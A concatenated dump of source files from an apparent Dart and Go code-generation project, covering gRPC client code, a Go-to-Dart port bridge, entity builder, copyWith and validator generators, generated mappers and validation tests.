RecipeTypes? pRecipeTypes,
Recipe? pRecipe,
List<String>? pListStrings,
List<int>? pListInts,
List<RecipeTypes>? pListRecipeTypes,
List<Recipe>? pListRecipes,
Set<String>? pSetString,
Set<int>? pSetInt,
Set<RecipeTypes>? pSetRecipeTypes,
Set<Recipe>? pSetRecipe,
Iterable<String>? pIterableString,
Iterable<int>? pIterableInt,
Iterable<RecipeTypes>? pIterableRecipeTypes,
Iterable<Recipe>? pIterableRecipe,
) async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters();
if (pString != null) {
$parm.pString = pString;
}
$parm.pStringHasValue = pString != null;
if (pInt != null) {
$parm.pInt = pInt;
}
$parm.pIntHasValue = pInt != null;
if (pRecipeTypes != null) {
$parm.pRecipeTypes = GRecipeTypes.valueOf(pRecipeTypes.index)!;
}
$parm.pRecipeTypesHasValue = pRecipeTypes != null;
if (pRecipe != null) {
$parm.pRecipe = const $RecipeProtoMapper().toProto(pRecipe);
}
$parm.pRecipeHasValue = pRecipe != null;
$parm.pListStrings.addAll(pListStrings ?? []);
$parm.pListStringsHasValue = pListStrings != null;
$parm.pListInts.addAll(pListInts ?? []);
$parm.pListIntsHasValue = pListInts != null;
$parm.pListRecipeTypes.addAll(pListRecipeTypes
?.map((e) => const $RecipeTypesProtoMapper().toProto(e)) ??
[]);
$parm.pListRecipeTypesHasValue = pListRecipeTypes != null;
$parm.pListRecipes.addAll(
pListRecipes?.map((e) => const $RecipeProtoMapper().toProto(e)) ?? []);
$parm.pListRecipesHasValue = pListRecipes != null;
$parm.pSetString.addAll(pSetString ?? []);
$parm.pSetStringHasValue = pSetString != null;
$parm.pSetInt.addAll(pSetInt ?? []);
$parm.pSetIntHasValue = pSetInt != null;
$parm.pSetRecipeTypes.addAll(pSetRecipeTypes
?.map((e) => const $RecipeTypesProtoMapper().toProto(e)) ??
[]);
$parm.pSetRecipeTypesHasValue = pSetRecipeTypes != null;
$parm.pSetRecipe.addAll(
pSetRecipe?.map((e) => const $RecipeProtoMapper().toProto(e)) ?? []);
$parm.pSetRecipeHasValue = pSetRecipe != null;
$parm.pIterableString.addAll(pIterableString ?? []);
$parm.pIterableStringHasValue = pIterableString != null;
$parm.pIterableInt.addAll(pIterableInt ?? []);
$parm.pIterableIntHasValue = pIterableInt != null;
$parm.pIterableRecipeTypes.addAll(pIterableRecipeTypes
?.map((e) => const $RecipeTypesProtoMapper().toProto(e)) ??
[]);
$parm.pIterableRecipeTypesHasValue = pIterableRecipeTypes != null;
$parm.pIterableRecipe.addAll(
pIterableRecipe?.map((e) => const $RecipeProtoMapper().toProto(e)) ??
[]);
$parm.pIterableRecipeHasValue = pIterableRecipe != null;
final $result = await serviceClient.receiveLotsOfNullableArgs($parm);
final $ret = List<int>.unmodifiable($result.value.map((e) => e));
return $ret;
}
}
<|start_filename|>firebase-auth-admin/go/dart_api_dl/dart_api_dl.go<|end_filename|>
package dart_api_dl
// #include <stdlib.h>
// #include "stdint.h"
// #include "include/dart_api_dl.c"
//
// // Go does not allow calling C function pointers directly. So we are
// // forced to provide a trampoline.
// bool GoDart_PostCObject(Dart_Port_DL port, Dart_CObject* obj) {
// return Dart_PostCObject_DL(port, obj);
// }
import "C"
import (
"encoding/json"
"unsafe"
)
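// Init initializes the Dart DL C API with the function table pointer handed
// over from the Dart side. It panics when the bundled headers under include/
// do not match the Dart SDK version.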
func Init(api unsafe.Pointer) {
if C.Dart_InitializeApiDL(api) != 0 {
panic("failed to initialize Dart DL C API: version mismatch. " +
"must update include/ to match Dart SDK version")
}
}
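// SendInt64ToPort posts a single int64 value to the Dart native port
// identified by port.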
func SendInt64ToPort(port int64, msg int64) {
var obj C.Dart_CObject
obj._type = C.Dart_CObject_kInt64
// cgo does not support unions so we are forced to do this
*(*C.int64_t)(unsafe.Pointer(&obj.value)) = C.int64_t(msg)
C.GoDart_PostCObject(C.long(port), &obj)
}
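// SendDataToPort wraps msg in a {"data": msg} map and sends it to the port
// as a JSON string.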
func SendDataToPort(port int64, msg string) {
data := make(map[string]interface{})
data["data"] = msg
SendMapToPort(port, data)
}
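// SendErrorToPort sends err to the port as a JSON object of the form
// {"error": "..."}.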
func SendErrorToPort(port int64, err error) {
data := make(map[string]interface{})
data["error"] = err.Error()
json, err := json.Marshal(data)
var strJson string
if err != nil {
strJson = "Error marshalling error message"
} else {
strJson = string(json)
}
SendStringToPort(port, strJson)
}
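// SendMapToPort marshals data to JSON and sends the resulting string to the
// port; marshalling failures are reported through SendErrorToPort instead.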
func SendMapToPort(port int64, data map[string]interface{}) {
json, err := json.Marshal(data)
if err != nil {
SendErrorToPort(port, err)
return
}
SendStringToPort(port, string(json))
}
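// SendStringToPort posts value as a Dart string object to the given native
// port and frees the temporary C string afterwards.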
func SendStringToPort(port int64, value string) {
ret := C.CString(value)
var obj C.Dart_CObject
obj._type = C.Dart_CObject_kString
// cgo does not support unions so we are forced to do this
*(**C.char)(unsafe.Pointer(&obj.value)) = ret
C.GoDart_PostCObject(C.long(port), &obj)
C.free(unsafe.Pointer(ret))
}
<|start_filename|>entity/entity_generator/lib/src/copywith_generator/copywith_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:build/build.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import 'field_descriptor.dart';
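/// Generates a `copyWith` extension for classes annotated with [CopyWith],
/// adding an optional `set<Field>ToNull` flag for every nullable field.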
class CopyWithGenerator extends GeneratorForAnnotation<CopyWith> {
late String _className;
CopyWithGenerator(BuilderOptions options);
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
var classElement = element.asClassElement();
if (classElement.kind == ElementKind.ENUM) return '';
_className = classElement.name;
var fieldDescriptors = _getFieldDescriptors(classElement);
if (fieldDescriptors.isEmpty) return '';
var renderBuffer = StringBuffer();
renderBuffer.writeln(_renderCopyWithExtension(fieldDescriptors));
return renderBuffer.toString();
}
String _renderCopyWithExtension(Iterable<FieldDescriptor> fieldDescriptors) {
var className = _className;
var copyWithParameterFieldBuffer = StringBuffer();
var copyWithAssignmentFieldBuffer = StringBuffer();
for (var fieldDescriptor in fieldDescriptors) {
copyWithParameterFieldBuffer.writeln(
'${fieldDescriptor.fieldElementTypeName}? ${fieldDescriptor.displayName},');
var resetFieldName = fieldDescriptor.isNullable
? 'set${fieldDescriptor.pascalName}ToNull'
: null;
if (resetFieldName != null) {
copyWithParameterFieldBuffer.writeln('bool $resetFieldName = false,');
}
copyWithAssignmentFieldBuffer.writeln(
'''${fieldDescriptor.displayName}: ${resetFieldName == null ? '' : '$resetFieldName ? null :'} ${fieldDescriptor.displayName} ?? this.${fieldDescriptor.displayName},''',
);
}
var copyWithExtension = '''
extension \$${className}CopyWithExtension on $className {
$className copyWith({
$copyWithParameterFieldBuffer
}) {
return $className(
$copyWithAssignmentFieldBuffer
);
}
}
''';
return copyWithExtension;
}
}
Iterable<FieldDescriptor> _getFieldDescriptors(ClassElement classElement) {
final fieldSet = classElement.getSortedFieldSet();
final fieldDescriptors = fieldSet
.map((fieldElement) => FieldDescriptor.fromFieldElement(fieldElement));
return fieldDescriptors;
}
<|start_filename|>grpc_host/lib/src/security/security.dart<|end_filename|>
export 'authentication_extensions.dart';
export 'principal.dart';
<|start_filename|>entity/entity_generator/lib/src/builder_generator/builder_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:build/build.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import 'field_code_generator.dart';
import 'field_descriptor.dart';
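/// Generates a `$<ClassName>Builder` class for types annotated with
/// [BuildBuilder], including `build`/`tryBuild` methods and, when
/// `createBuilderBaseClass` is set, a `rebuild` extension on the entity.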
class BuilderGenerator extends GeneratorForAnnotation<BuildBuilder> {
late String _className;
BuilderGenerator(BuilderOptions options);
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
final readAnnotation = _hydrateAnnotation(annotation);
var classElement = element.asClassElement();
if (classElement.kind == ElementKind.ENUM) return '';
_className = classElement.name;
var fieldDescriptors = _getFieldDescriptors(classElement);
if (fieldDescriptors.isEmpty) return '';
var renderBuffer = StringBuffer();
renderBuffer.writeln(_renderBuilder(readAnnotation, fieldDescriptors));
return renderBuffer.toString();
}
String _renderBuilder(
BuildBuilder builder,
Iterable<FieldDescriptor> fieldDescriptors,
) {
final className = _className;
final builderClassName =
'\$${className}Builder${builder.createBuilderBaseClass ? 'Base' : ''}';
final fieldBuffer = StringBuffer();
final assignmentBuffer = StringBuffer();
final constructorBuffer = StringBuffer();
final constructorAssignmentBuffer = StringBuffer();
final constructorStatementBuffer = StringBuffer();
final entityConstructorBuffer = StringBuffer();
var usesDefaultsProvider = false;
for (var fieldDescriptor in fieldDescriptors) {
var gen = FieldCodeGenerator.fromFieldDescriptor(
fieldDescriptor,
builder,
);
usesDefaultsProvider = usesDefaultsProvider || gen.usesDefaultsProvided;
fieldBuffer.writeln(gen.fieldDeclaration);
constructorBuffer.writeln(gen.constructorDeclaration);
final constructorStatement = gen.constructorStatement;
if (constructorStatement.isNotEmpty) {
constructorStatementBuffer.writeln(constructorStatement);
}
final constructorAssignment = gen.constructorAssignment;
if (constructorAssignment.isNotEmpty) {
constructorAssignmentBuffer.write(
'''${constructorAssignmentBuffer.length == 0 ? ':' : ','} $constructorAssignment''');
}
assignmentBuffer.writeln(gen.toBuilderMap);
entityConstructorBuffer.writeln(gen.entityConstructorMap);
}
final extensionClass = builder.createBuilderBaseClass
? '''
extension \$${className}BuilderExtension on $className {
$className rebuild() {
final builder = \$${className}Builder.from$className(this);
final entity = builder.build();
return entity;
}
}
'''
: '';
final defaultsProvider = usesDefaultsProvider
? 'final _defaultsProvider = \$${className}DefaultsProvider();'
: '';
final constructorStatement = constructorStatementBuffer.isEmpty
? ';'
: '''{
$constructorStatementBuffer
}''';
var ret = '''
class $builderClassName implements Builder<$className> {
$defaultsProvider
$fieldBuffer
$builderClassName({ $constructorBuffer })
$constructorAssignmentBuffer
$constructorStatement
$builderClassName.from$className($className entity)
: this($assignmentBuffer);
@override
$className build() {
final entity = _build();
const \$${className}Validator().validateThrowing(entity);
return entity;
}
@override
BuildResult<$className> tryBuild() {
try {
final entity = _build();
final errors = \$${className}Validator().validate(entity);
final result =
BuildResult<$className>(result: entity, validationErrors: errors);
return result;
} catch (ex) {
return BuildResult<$className>(exception: ex);
}
}
$className _build() {
var entity = $className(
$entityConstructorBuffer
);
return entity;
}
}
$extensionClass
''';
return ret;
}
}
Iterable<FieldDescriptor> _getFieldDescriptors(ClassElement classElement) {
final fieldSet = classElement.getSortedFieldSet();
final fieldDescriptors = fieldSet
.map((fieldElement) => FieldDescriptor.fromFieldElement(fieldElement));
return fieldDescriptors;
}
BuildBuilder _hydrateAnnotation(ConstantReader reader) {
var validatable = BuildBuilder(
createBuilderBaseClass: reader.read('createBuilderBaseClass').boolValue,
useDefaultsProvider: reader.read('useDefaultsProvider').boolValue);
return validatable;
}
<|start_filename|>entity/entity_generator/lib/src/validation/validator_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:build/build.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_entity_generator/src/validation/validators/regular_expression_validator.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import 'field_descriptor.dart';
import 'validators/email_address_validator.dart';
import 'validators/property_validator.dart';
import 'validators/range_validator.dart';
import 'validators/required_validator.dart';
import 'validators/string_length_validator.dart';
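/// Generates a `$<ClassName>Validator` class for types annotated with
/// [Validatable], with one `validate<Field>` method per field plus
/// `validate` and `validateThrowing` entry points.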
class ValidatorGenerator extends GeneratorForAnnotation<Validatable> {
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
final validatable = _hydrateAnnotation(annotation);
final createBaseClass = validatable.createValidatableBaseClass;
try {
return generateValidator(element, createBaseClass);
} catch (ex, stack) {
print('*** Exception: $ex with stack: $stack');
rethrow;
}
}
static String generateValidator(Element element, bool createBaseClass) {
var classElement = element.asClassElement();
if (classElement.kind == ElementKind.ENUM) return '';
var superTypeElement = classElement.supertype!.element;
var annotation = TypeChecker.fromRuntime(Validatable)
.firstAnnotationOf(superTypeElement);
var superClassIsValidatable = annotation != null;
var className = classElement.name;
var fieldDescriptors = _getFieldDescriptors(classElement);
var errorCallBuffer = StringBuffer();
var validationMethodBuffer = StringBuffer();
final nullValidationMethodBuffer = StringBuffer();
for (var fieldDescriptor in fieldDescriptors) {
var errorLine = '''
if ((error = validate${fieldDescriptor.pascalName}(entity.${fieldDescriptor.displayName}, entity: entity)) != null) {
errors.add(error!);
}
''';
errorCallBuffer.writeln(errorLine);
var validationMethodCode =
_createValidationMethod(fieldDescriptor, className);
validationMethodBuffer.writeln(validationMethodCode);
final nullValidationMethodCode =
_createNullValidationMethod(fieldDescriptor, className);
if (nullValidationMethodCode.isNotEmpty) {
nullValidationMethodBuffer.writeln(nullValidationMethodCode);
}
}
var validatorClassName = createBaseClass
? '\$${className}ValidatorBase'
: '\$${className}Validator';
var construction =
'''const \$${className}Validator${createBaseClass ? 'Base' : ''}();''';
var extendsClause = !superClassIsValidatable
? ''
: 'extends \$${superTypeElement.name}Validator';
var returnStatement = !superClassIsValidatable
? 'return ErrorList(errors);'
: 'return ErrorList.merge(super.validate(entity), errors);';
var ret = '''
class $validatorClassName $extendsClause implements Validator {
$construction
$validationMethodBuffer
$nullValidationMethodBuffer
@override
ErrorList validate(covariant $className entity) {
var errors = <ValidationError>[];
${errorCallBuffer.isNotEmpty ? 'ValidationError? error;' : ''}
$errorCallBuffer
$returnStatement
}
@override
void validateThrowing(covariant $className entity) {
var errors = validate(entity);
if (errors.validationErrors.isNotEmpty) throw errors;
}
}
''';
return ret;
}
static String _createNullValidationMethod(
FieldDescriptor fieldDescriptor, String className) {
if (fieldDescriptor.isNullable) {
return '';
}
final nullValidationMethodCode = '''
ValidationError? \$validate${fieldDescriptor.pascalName}(${fieldDescriptor.fieldElementTypeName}? value, {$className? entity})
{
if (value == null) {
return RequiredValidationError('${fieldDescriptor.displayName}');
}
return validate${fieldDescriptor.pascalName}(value, entity: entity);
}
''';
return nullValidationMethodCode;
}
static String _createValidationMethod(
FieldDescriptor fieldDescriptor,
String className,
) {
final validators = <PropertyValidator>[
RequiredValidator(),
StringLengthValidator(),
RegularExpressionValidator(),
RangeValidator(),
EmailAddressValidator(),
];
var propValidation = StringBuffer();
var previousNullCheck = false;
for (var validator in validators) {
final result =
validator.createValidatorCode(fieldDescriptor, previousNullCheck);
if (result.item2) {
previousNullCheck = true;
}
propValidation.writeln(result.item1);
}
var entityCode = _createEntityCode(fieldDescriptor);
var listCode = _createListCode(fieldDescriptor);
var ret = '''
ValidationError? validate${fieldDescriptor.pascalName}(${fieldDescriptor.fieldElementType.getDisplayString(withNullability: true)} value, {$className? entity})
{
$propValidation
$entityCode
$listCode
return null;
}
''';
return ret;
}
static String _createListCode(FieldDescriptor fieldDescriptor) {
if ((!fieldDescriptor.fieldElementType.isDartCoreIterable &&
!fieldDescriptor.fieldElementType.isDartCoreList &&
!fieldDescriptor.fieldElementType.isDartCoreSet) ||
!fieldDescriptor.parameterTypeIsValidatable ||
fieldDescriptor.parameterTypeIsEnum) return '';
final nullEscape =
fieldDescriptor.isNullable ? 'if (value == null) return null;' : '';
final asList = fieldDescriptor.fieldElementType.isDartCoreList
? ''
: 'final asList = value.toList();';
final parmType = fieldDescriptor.iterableParameterType ??
fieldDescriptor.listParameterType ??
fieldDescriptor.setParameterType;
final code = '''
$nullEscape
$asList
var errorLists = value.map((entity) {
var errors = \$${parmType!.getDisplayString(withNullability: false)}Validator().validate(entity);
var itemErrors = ListItemErrorList(${asList.isEmpty ? 'value' : 'asList'}, entity, errors);
return itemErrors;
}).where((p) => p.errorList.validationErrors.isNotEmpty).toList();
if (errorLists.isNotEmpty) {
return ListPropertyValidation('${fieldDescriptor.displayName}', errorLists);
}
''';
return code;
}
static String _createEntityCode(FieldDescriptor fieldDescriptor) {
if (!fieldDescriptor.typeIsValidatable || fieldDescriptor.typeIsEnum) {
return '';
}
var nullEscape = fieldDescriptor.isNullable
? 'if (value == null) { return null; } '
: '';
var code = '''
$nullEscape
var errors =
\$${fieldDescriptor.fieldElementType.getDisplayString(withNullability: false)}Validator().validate(value);
var errorListValidation = PropertyValidation('${fieldDescriptor.displayName}', errors);
if (errorListValidation.errorList.validationErrors.isNotEmpty) {
return errorListValidation;
}
''';
return code;
}
}
Iterable<FieldDescriptor> _getFieldDescriptors(ClassElement classElement) {
final fieldSet = classElement.getSortedFieldSet(includeInherited: false);
final fieldDescriptors =
fieldSet.map((fieldElement) => FieldDescriptor.fromFieldElement(
classElement,
fieldElement,
));
return fieldDescriptors;
}
Validatable _hydrateAnnotation(ConstantReader reader) {
var validatable = Validatable(
createValidatableBaseClass:
reader.read('createValidatableBaseClass').literalValue as bool? ??
false,
);
return validatable;
}
<|start_filename|>entity/entity_generator/lib/src/builder_generator/field_code_generators/entity_field_code_generator.dart<|end_filename|>
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import '../field_code_generator.dart';
import '../field_descriptor.dart';
class EntityFieldCodeGenerator extends FieldCodeGenerator {
EntityFieldCodeGenerator(
FieldDescriptor fieldDescriptor,
BuildBuilder buildBuilder,
) : super(fieldDescriptor, buildBuilder);
@override
String get fieldType => '\$${fieldDescriptor.fieldElementTypeName}Builder';
@override
String get fieldDeclaration =>
' $fieldType${fieldDescriptor.nullSuffix} ${fieldDescriptor.displayName};';
@override
String get toBuilderExpression => fieldDescriptor.isNullable
? '''entity.${fieldDescriptor.displayName} == null ? null : \$${fieldDescriptor.fieldElementTypeName}Builder.from${fieldDescriptor.fieldElementTypeName}(entity.${fieldDescriptor.displayName}!)'''
: '''\$${fieldDescriptor.fieldElementTypeName}Builder.from${fieldDescriptor.fieldElementTypeName}(entity.${fieldDescriptor.displayName})''';
@override
String get constructorAssignment => fieldDescriptor.isNullable
? ''
: '${fieldDescriptor.displayName} = ${fieldDescriptor.displayName} ?? $fieldType()';
@override
String get constructorStatement => '';
@override
String get constructorExpression =>
'${fieldDescriptor.displayName}${fieldDescriptor.isNullable ? '?' : ''}.build()';
@override
String get defaultProvided =>
' ?? \$${fieldDescriptor.fieldElementTypeName}Builder()';
@override
bool get usesDefaultsProvided => false;
}
<|start_filename|>proto_mapper/test/lib/src/appliance_type.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'appliance_type.dart';
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $ApplianceTypeProtoMapper
implements ProtoMapper<ApplianceType, GApplianceType> {
const $ApplianceTypeProtoMapper();
@override
ApplianceType fromProto(GApplianceType proto) =>
ApplianceType.values[proto.value];
@override
GApplianceType toProto(ApplianceType entity) =>
GApplianceType.valueOf(entity.index)!;
}
extension $GApplianceTypeProtoExtension on GApplianceType {
ApplianceType toApplianceType() =>
const $ApplianceTypeProtoMapper().fromProto(this);
}
<|start_filename|>firebase-auth-admin/bin/common_options.dart<|end_filename|>
class CommonOptions {
final String privateKey;
CommonOptions({
required this.privateKey,
});
}
<|start_filename|>example_model/lib/src/recipe.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $RecipeMapMapper extends MapMapper<Recipe> {
const $RecipeMapMapper();
@override
Recipe fromMap(Map<String, dynamic> map) {
final $kh = const DefaultKeyHandler();
return Recipe(
key: $kh.keyFromMap(map, 'key'),
title: map['title'] as String,
ingredients: List<Ingredient>.unmodifiable(map['ingredients']
.map((e) => const $IngredientMapMapper().fromMap(e))),
runtimeTag: map['runtimeTag'] as String?,
);
}
@override
Map<String, dynamic> toMap(Recipe instance) {
final $kh = const DefaultKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.key, 'key');
map['title'] = instance.title;
map['ingredients'] = instance.ingredients
.map((e) => const $IngredientMapMapper().toMap(e))
.toList();
map['runtimeTag'] = instance.runtimeTag;
return map;
}
}
extension $RecipeMapExtension on Recipe {
Map<String, dynamic> toMap() => const $RecipeMapMapper().toMap(this);
static Recipe fromMap(Map<String, dynamic> map) =>
const $RecipeMapMapper().fromMap(map);
}
extension $MapRecipeExtension on Map<String, dynamic> {
Recipe toRecipe() => const $RecipeMapMapper().fromMap(this);
}
class $RecipeFieldNames {
final $kh = const DefaultKeyHandler();
final String fieldName;
final String prefix;
$RecipeFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $RecipeFieldNames()
: fieldName = '',
prefix = '';
static const _key = 'key';
String get key => prefix + $kh.fieldNameToMapKey(_key);
static const _title = 'title';
String get title => prefix + _title;
static const _ingredients = 'ingredients';
$IngredientFieldNames get ingredients =>
$IngredientFieldNames.sub(prefix + _ingredients);
static const _runtimeTag = 'runtimeTag';
String get runtimeTag => prefix + _runtimeTag;
@override
String toString() => fieldName;
}
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $RecipeProtoMapper implements ProtoMapper<Recipe, GRecipe> {
const $RecipeProtoMapper();
@override
Recipe fromProto(GRecipe proto) => _$RecipeFromProto(proto);
@override
GRecipe toProto(Recipe entity) => _$RecipeToProto(entity);
Recipe fromJson(String json) => _$RecipeFromProto(GRecipe.fromJson(json));
String toJson(Recipe entity) => _$RecipeToProto(entity).writeToJson();
String toBase64Proto(Recipe entity) =>
base64Encode(utf8.encode(entity.toProto().writeToJson()));
Recipe fromBase64Proto(String base64Proto) =>
GRecipe.fromJson(utf8.decode(base64Decode(base64Proto))).toRecipe();
}
GRecipe _$RecipeToProto(Recipe instance) {
var proto = GRecipe();
proto.key = instance.key;
proto.ptitle = instance.title;
proto.ingredients.addAll(instance.ingredients
.map((e) => const $IngredientProtoMapper().toProto(e)));
return proto;
}
Recipe _$RecipeFromProto(GRecipe instance) => Recipe(
key: instance.key,
title: instance.ptitle,
ingredients: List<Ingredient>.unmodifiable(instance.ingredients
.map((e) => const $IngredientProtoMapper().fromProto(e))),
);
extension $RecipeProtoExtension on Recipe {
GRecipe toProto() => _$RecipeToProto(this);
String toJson() => _$RecipeToProto(this).writeToJson();
static Recipe fromProto(GRecipe proto) => _$RecipeFromProto(proto);
static Recipe fromJson(String json) =>
_$RecipeFromProto(GRecipe.fromJson(json));
}
extension $GRecipeProtoExtension on GRecipe {
Recipe toRecipe() => _$RecipeFromProto(this);
}
<|start_filename|>map_mapper/test_mongo/lib/src/person.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'person.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $PersonMapMapper extends MapMapper<Person> {
const $PersonMapMapper();
@override
Person fromMap(Map<String, dynamic> map) {
final $kh = const MongoKeyHandler();
final defaultsProvider = $PersonDefaultsProvider();
return Person(
key: getValueOrDefault($kh.fieldNameToMapKey('key'),
() => defaultsProvider.key, (mapValue) => $kh.keyFromMap(map, 'key')),
name: getValueOrDefault(map['name'], () => defaultsProvider.name,
(mapValue) => mapValue as String),
);
}
@override
Map<String, dynamic> toMap(Person instance) {
final $kh = const MongoKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.key, 'key');
map['name'] = instance.name;
return map;
}
}
extension $PersonMapExtension on Person {
Map<String, dynamic> toMap() => const $PersonMapMapper().toMap(this);
static Person fromMap(Map<String, dynamic> map) =>
const $PersonMapMapper().fromMap(map);
}
extension $MapPersonExtension on Map<String, dynamic> {
Person toPerson() => const $PersonMapMapper().fromMap(this);
}
class $PersonFieldNames {
final $kh = const MongoKeyHandler();
final String fieldName;
final String prefix;
$PersonFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $PersonFieldNames()
: fieldName = '',
prefix = '';
static const _key = 'key';
String get key => prefix + $kh.fieldNameToMapKey(_key);
static const _name = 'name';
String get name => prefix + _name;
@override
String toString() => fieldName;
}
<|start_filename|>map_mapper/map_mapper_generator/lib/src/field_code_generator.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:map_mapper_annotations/map_mapper_annotations.dart';
import 'package:map_mapper_generator/src/field_code_generators/key_field_code_generator.dart';
import 'field_code_generators/date_time_field_code_generator.dart';
import 'field_code_generators/decimal_field_code_generator.dart';
import 'field_code_generators/duration_field_code_generator.dart';
import 'field_code_generators/entity_field_code_generator.dart';
import 'field_code_generators/enum_field_code_generator.dart';
import 'field_code_generators/generic_field_code_generator.dart';
import 'field_code_generators/list_field_code_generator.dart';
import 'field_code_generators/set_field_code_generator.dart';
import 'field_descriptor.dart';
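/// Base class for the per-field code emitted by the map mapper generator.
///
/// The [FieldCodeGenerator.fromFieldDescriptor] factory picks a specialized
/// generator depending on the field type (key, Decimal, DateTime, Duration,
/// enum, nested entity, Set, List/Iterable or generic).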
abstract class FieldCodeGenerator {
final FieldDescriptor fieldDescriptor;
final bool hasDefaultsProvider;
MapMap get mapEntityAnnotation => fieldDescriptor.mapMapAnnotation;
String get mapName => fieldDescriptor.mapName;
FieldCodeGenerator(this.fieldDescriptor, this.hasDefaultsProvider);
bool get usesKh => false;
String get toMapMap =>
'''map['$mapName'] = ${fieldDescriptor.isNullable ? toNullableMapExpression : toMapExpression} ;''';
String get _defaultsProviderExpression {
var ret = '''getValueOrDefault(
$mapValue, () => defaultsProvider.$fieldName, (mapValue) => ${fromMapExpression('mapValue')})''';
return ret;
}
String get mapValue => 'map[\'$mapName\']';
String get constructorMap =>
'''$fieldName: ${fieldDescriptor.isNullable ? fromNullableMapExpression : (hasDefaultsProvider ? _defaultsProviderExpression : fromMapExpression('map[\'$mapName\']'))},''';
String get fromMapMap =>
'''..$fieldName = ${fieldDescriptor.isNullable ? fromNullableMapExpression : fromMapExpression('map[\'$mapName\']')} ''';
String get fieldNamesClassFieldName =>
'static const _$fieldName = \'$fieldName\';';
String get fieldNamesClassGetter =>
'String get $fieldName => prefix + _$fieldName;';
String get toMapExpression => 'instance.$fieldName';
String get toNullableMapExpression => toMapExpression;
String fromMapExpression(String sourceExpression) {
return '$sourceExpression as ${fieldDescriptor.fieldElementTypeName}';
}
String get fromNullableMapExpression =>
'''map['$mapName'] == null ? null : ${fromMapExpression('map[\'$mapName\']')}''';
String get fieldName => fieldDescriptor.displayName;
factory FieldCodeGenerator.fromFieldDescriptor(
FieldDescriptor fieldDescriptor,
bool hasDefaultsProvider,
) {
if (fieldDescriptor.isKey) {
return KeyFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementTypeName == (Decimal).toString()) {
return DecimalFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementTypeName == (DateTime).toString()) {
return DateTimeFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementTypeName == (Duration).toString()) {
return DurationFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.typeIsEnum) {
return EnumFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.typeHasMapMapAnnotation) {
return EntityFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementType.isDartCoreSet) {
return SetFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementType.isDartCoreList ||
fieldDescriptor.fieldElementType.isDartCoreIterable) {
return ListFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
return GenericFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
}
<|start_filename|>entity/test/test/squarealfa_validation_test_test.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:squarealfa_validation_test/squarealfa_validation_test.dart';
import 'package:squarealfa_validation_test/src/empty.dart';
import 'package:test/test.dart';
void main() {
group('main group', () {
test('no error', () {
var recipe = Recipe(title: 'something', description: 'something');
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descriptionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError, null);
expect(descriptionError, null);
expect(recipeErrors.validationErrors.isEmpty, true);
expect(recipeErrors.hasErrors, false);
});
test('missing title', () {
var recipe = Recipe(title: '', description: 'something');
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descriptionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError?.propertyName, 'title');
expect(descriptionError, null);
expect(recipeErrors.validationErrors.first.propertyName, 'title');
expect(recipeErrors.validationErrors.length, 1);
expect(recipeErrors.hasErrors, true);
});
test('null description', () {
var recipe = Recipe(title: 'something', description: null);
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descriptionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError, null);
expect(descriptionError?.propertyName, 'description');
expect(recipeErrors.validationErrors.first.propertyName, 'description');
expect(recipeErrors.validationErrors.length, 1);
expect(recipeErrors.hasErrors, true);
});
test('empty description', () {
var recipe = Recipe(title: 'something', description: '');
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descriptionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError, null);
expect(descriptionError?.propertyName, 'description');
expect(recipeErrors.validationErrors.first.propertyName, 'description');
